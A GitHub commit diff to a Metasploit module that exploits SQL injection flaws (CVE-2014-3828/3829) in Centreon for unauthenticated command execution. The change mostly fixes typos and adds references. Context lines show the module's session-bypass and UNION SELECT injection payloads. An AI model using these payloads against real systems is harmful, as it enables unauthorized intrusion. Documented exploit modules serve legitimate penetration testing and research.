Skip to content

Commit d831a20

Browse files
committed
Add references and fix typos
1 parent 299d9af commit d831a20

File tree

1 file changed

+10
-7
lines changed

1 file changed

+10
-7
lines changed

modules/exploits/linux/http/centreon_sqli_exec.rb

Lines changed: 10 additions & 7 deletions
Original file line numberDiff line numberDiff line change
@@ -16,21 +16,23 @@ def initialize(info = {})
1616
'Description' => %q{
1717
This module exploits several vulnerabilities on Centreon 2.5.1 and prior and Centreon
1818
Enterprise Server 2.2 and prior. The combination of both vulnerabilities, in the
19-
displayServiceStatus.php component, allow to remote unauthenticated execution of
20-
arbitrary commands. The module only requires a session available in the application
21-
at the moment of exploitation. This module has been tested successfully on Centreon
22-
Enterprise Server 2.2.
19+
displayServiceStatus.php component, allows remote unauthenticated execution of arbitrary
20+
commands. The module only requires a session available in the application at the moment
21+
of exploitation. It means a legit ust must be logged in. This module has been tested
22+
successfully on Centreon Enterprise Server 2.2.
2323
},
2424
'License' => MSF_LICENSE,
2525
'Author' =>
2626
[
27-
'Tom MaZ', # Vulnerability Discovery
27+
'MaZ', # Vulnerability Discovery and Analysis
2828
'juan vazquez' # Metasploit Module
2929
],
3030
'References' =>
3131
[
3232
['CVE', '2014-3828'],
33-
['CVE', '2014-3829']
33+
['CVE', '2014-3829'],
34+
['US-CERT-VU', '298796'],
35+
['URL', 'http://seclists.org/fulldisclosure/2014/Oct/78']
3436
],
3537
'Arch' => ARCH_CMD,
3638
'Platform' => 'unix',
@@ -84,7 +86,7 @@ def exploit
8486
if check == Exploit::CheckCode::Safe
8587
fail_with(Failure::NotVulnerable, "#{peer} - The SQLi cannot be exploited")
8688
elsif check == Exploit::CheckCode::Detected
87-
fail_with(Failure::Unknown, "#{peer} - The SQLi cannot be exploited or you just need to wait until someone logged in")
89+
fail_with(Failure::Unknown, "#{peer} - The SQLi cannot be exploited, maybe you just need to wait until someone logs in")
8890
end
8991

9092
print_status("#{peer} - Exploiting...")
@@ -93,6 +95,7 @@ def exploit
9395
session_injection = "#{random_id}' or '#{random_char}'='#{random_char}"
9496
template_injection = "' UNION ALL SELECT 1,2,3,4,5,CHAR(59,#{mysql_payload}59),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23 -- /**"
9597
res = send_template_id(session_injection, template_injection)
98+
9699
if res && res.body && res.body.to_s =~ /sh: --imgformat: command not found/
97100
vprint_status("Output: #{res.body}")
98101
end

0 commit comments

Comments
 (0)